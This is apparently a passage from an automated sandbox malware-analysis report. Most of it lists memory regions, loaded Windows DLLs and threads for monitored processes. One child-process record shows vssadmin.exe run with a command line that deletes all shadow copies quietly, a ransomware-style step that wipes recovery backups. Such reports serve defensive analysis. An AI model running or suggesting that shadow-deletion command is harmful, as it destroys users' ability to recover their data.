	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 3457
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 3458
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 3459
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 3460
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 3461
	        start_va = 0x1f876730000
	          end_va = 0x1f876736fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876730000"
	        filename = ""

Region:
	              id = 3462
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 3482
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 3483
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 3484
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 3485
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 3496
	        start_va = 0x1f876740000
	          end_va = 0x1f876740fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876740000"
	        filename = ""

Region:
	              id = 3497
	        start_va = 0x1f876750000
	          end_va = 0x1f876750fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876750000"
	        filename = ""

Region:
	              id = 3498
	        start_va = 0x1f876950000
	          end_va = 0x1f876ad7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876950000"
	        filename = ""

Region:
	              id = 3499
	        start_va = 0x1f876ae0000
	          end_va = 0x1f876c60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876ae0000"
	        filename = ""

Region:
	              id = 3500
	        start_va = 0x1f876c70000
	          end_va = 0x1f87806ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876c70000"
	        filename = ""

Region:
	              id = 3501
	        start_va = 0x1f878070000
	          end_va = 0x1f8781effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f878070000"
	        filename = ""

Region:
	              id = 3505
	        start_va = 0xa829560000
	          end_va = 0xa82959ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a829560000"
	        filename = ""

Region:
	              id = 3506
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 3507
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 3508
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 3509
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 3510
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 3511
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 3512
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 3513
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 3514
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 3518
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 3519
	        start_va = 0x1f8781f0000
	          end_va = 0x1f87837ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f8781f0000"
	        filename = ""

Region:
	              id = 3533
	        start_va = 0x1f878380000
	          end_va = 0x1f8786b6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3534
	        start_va = 0x1f876780000
	          end_va = 0x1f8767d9fff
	       monitored = 1
	     entry_point = 0x1f8767953f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 3535
	        start_va = 0x1f8767e0000
	          end_va = 0x1f876800fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 3543
	        start_va = 0x1f8786c0000
	          end_va = 0x1f8788d8fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f8786c0000"
	        filename = ""

Region:
	              id = 3550
	        start_va = 0x1f8788e0000
	          end_va = 0x1f878afdfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f8788e0000"
	        filename = ""

Region:
	              id = 3551
	        start_va = 0x1f878070000
	          end_va = 0x1f87817efff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f878070000"
	        filename = ""

Region:
	              id = 3552
	        start_va = 0x1f8781e0000
	          end_va = 0x1f8781effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f8781e0000"
	        filename = ""

Region:
	              id = 3558
	        start_va = 0x1f878b00000
	          end_va = 0x1f878d19fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f878b00000"
	        filename = ""

Region:
	              id = 3559
	        start_va = 0x1f8781f0000
	          end_va = 0x1f8782fcfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f8781f0000"
	        filename = ""

Region:
	              id = 3560
	        start_va = 0x1f878370000
	          end_va = 0x1f87837ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f878370000"
	        filename = ""

Region:
	              id = 3568
	        start_va = 0xa8295a0000
	          end_va = 0xa8295dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8295a0000"
	        filename = ""

Region:
	              id = 3569
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 3570
	        start_va = 0x1f876760000
	          end_va = 0x1f876760fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876760000"
	        filename = ""

Region:
	              id = 3571
	        start_va = 0x1f876780000
	          end_va = 0x1f87683bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876780000"
	        filename = ""

Region:
	              id = 3572
	        start_va = 0x1f876760000
	          end_va = 0x1f876763fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876760000"
	        filename = ""

Region:
	              id = 3573
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 3576
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 3577
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 3578
	        start_va = 0x1f876840000
	          end_va = 0x1f876846fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876840000"
	        filename = ""

Region:
	              id = 3579
	        start_va = 0x1f878180000
	          end_va = 0x1f878180fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f878180000"
	        filename = ""

Region:
	              id = 3580
	        start_va = 0x1f878190000
	          end_va = 0x1f878190fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f878190000"
	        filename = ""

Region:
	              id = 3581
	        start_va = 0x1f8781a0000
	          end_va = 0x1f8781a4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 3604
	        start_va = 0x1f8781b0000
	          end_va = 0x1f8781b0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 3608
	        start_va = 0x1f8781c0000
	          end_va = 0x1f8781c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f8781c0000"
	        filename = ""

Region:
	              id = 3609
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 3610
	        start_va = 0x1f8781d0000
	          end_va = 0x1f8781d0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 3611
	        start_va = 0x1f878300000
	          end_va = 0x1f878301fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f878300000"
	        filename = ""


Thread:
	id = 271
	os_tid = 0x78c


Thread:
	id = 274
	os_tid = 0xb74


Thread:
	id = 276
	os_tid = 0xb2c


Thread:
	id = 279
	os_tid = 0x15c


Process:
	id = "46"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2e828000"
	os_pid = "0x1294"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xc38"
	cmd_line = "vssadmin  Delete Shadows /For=P: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3464
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3465
	        start_va = 0x30000
	          end_va = 0x33fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3466
	        start_va = 0x40000
	          end_va = 0x41fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000040000"
	        filename = ""

Region:
	              id = 3467
	        start_va = 0x50000
	          end_va = 0x64fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000050000"
	        filename = ""

Region:
	              id = 3468
	        start_va = 0x70000
	          end_va = 0xaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000070000"
	        filename = ""

Region:
	              id = 3469
	        start_va = 0xb0000
	          end_va = 0xeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000b0000"
	        filename = ""

Region:
	              id = 3470
	        start_va = 0xf0000
	          end_va = 0xf0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000f0000"
	        filename = ""

Region:
	              id = 3471
	        start_va = 0x100000
	          end_va = 0x101fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 3472
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 3473
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 3474
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 3475
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3476
	        start_va = 0x7eb20000
	          end_va = 0x7eb42fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb20000"
	        filename = ""

Region:
	              id = 3477
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3478
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3479
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3480
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3481
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3486
	        start_va = 0x400000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 3487
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3488
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3489
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3492
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3493
	        start_va = 0x400000
	          end_va = 0x4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 3494
	        start_va = 0x550000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000550000"
	        filename = ""

Region:
	              id = 3495
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3502
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3503
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3504
	        start_va = 0x7ea20000
	          end_va = 0x7eb1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea20000"
	        filename = ""

Region:
	              id = 3520
	        start_va = 0x110000
	          end_va = 0x1cdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3521
	        start_va = 0x40000
	          end_va = 0x43fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000040000"
	        filename = ""

Region:
	              id = 3522
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 3523
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3525
	        start_va = 0x500000
	          end_va = 0x53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 3526
	        start_va = 0x560000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 3527
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 3528
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 3529
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 3530
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 3531
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 3532
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 3536
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 3537
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 3538
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 3539
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 3540
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 3541
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 3544
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 3545
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 3546
	        start_va = 0x5a0000
	          end_va = 0x60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3547
	        start_va = 0x1d0000
	          end_va = 0x1f9fff
	       monitored = 0
	     entry_point = 0x1d5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3548
	        start_va = 0x610000
	          end_va = 0x797fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000610000"
	        filename = ""

Region:
	              id = 3549
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3553
	        start_va = 0x1d0000
	          end_va = 0x1dcfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 3554
	        start_va = 0x4880000
	          end_va = 0x4a00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 3555
	        start_va = 0x4a10000
	          end_va = 0x5e0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a10000"
	        filename = ""

Region:
